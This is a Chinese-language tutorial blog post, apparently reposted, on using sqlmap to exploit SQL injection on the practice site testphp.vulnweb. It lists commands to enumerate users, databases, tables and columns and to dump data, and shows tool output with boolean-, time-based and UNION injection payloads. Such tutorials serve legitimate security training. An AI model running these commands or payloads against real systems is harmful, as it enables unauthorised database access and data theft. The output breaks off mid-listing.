admin管理员组

文章数量:1647981

文章目录

  • sql注入漏洞--sqlmap使用
    • 基本流程:
    • 实战
    • get请求
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --users`
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --dbs`
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --current-user --current-db`
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --tables -D "acuart"`
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --columns -T "users" -D "acuart"`
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --count -T "products" -D "acuart"`
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --dump -T "products" -D "acuart" --start 2 --stop 3`
    • post请求:
      • 命令:`python sqlmap.py -r "sql-post.txt"`
      • 命令:`python sqlmap.py -u "http://testphp.vulnweb/userinfo.php" --data="pass=1ACUSTART'"HHIPsACUEND&uname=pHqghUme"`

sql注入漏洞–sqlmap使用

sqlmap工具获取:

基于python,需要有python环境

https://sqlmap/

基本流程:

  • 1.找到有数据库交互的功能页面
  • 2.判断页面是否存在sql注入
  • 3.利用sql注入漏洞读取数据
  • 4.导出所需数据保存

实战

http://testphp.vulnweb/artists.php?artist=1

get请求

命令:python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --users

        ___
       __H__
 ___ ___[)]_____ ___ ___  {
  1.5.5.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:18 /2021-06-16/

[16:15:19] [INFO] resuming back-end DBMS 'mysql'
[16:15:19] [INFO] testing connection to the target URL
[16:15:20] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:15:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[16:15:20] [INFO] fetching database users
          
          
++++++++++++++++++++++++++++++++++++++hear!!!++++++++++++++++++++++++++++
database management system users [1]:
[*] 'acuart'@'localhost'
++++++++++++++++++++++++++++++++++++++hear!!!++++++++++++++++++++++++++++
          
          
[16:15:20] [INFO] fetched data logged to text files under 'C:\Users\Lenovo\AppData\Local\sqlmap\output\testphp.vulnweb'

[*] ending @ 16:15:20 /2021-06-16/

命令:python sqlmap.py -u "http://testphp.vulnweb/artists.php?artist=1" --dbs

       ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.5.1#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:02 /2021-06-16/

[16:15:02] [INFO] resuming back-end DBMS 'mysql'
[16:15:02] [INFO] testing connection to the target URL
[16:15:03] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[16:15:03] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:15:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[16:15:03] [INFO] fetching database names
[16:15:04] [WARNING] the SQL query provided does not return any output
[16:15:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:15:04] [INFO] fetching number of databases
[16:15:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:15:04] [INFO] retrieved: 0
[16:15:07] [ERROR] unable to retrieve the number of databases
[16:15:07] [INFO] falling back to current database
[16:15:07] [INFO] fetching current database



+++++++++++++++++++++++++++++++++++++++++hear!!!!!++++++++++++++++++++++++++++++++++++++
available databases [1]:
[*] acuart
+++++++++++++++++++++++++++++++++++++++++hear!!!!!++++++++&#

本文标签: 漏洞sqlsqlmap

版权声明:本文标题:sql注入漏洞--sqlmap使用 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dianzi/1729494491a1202776.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。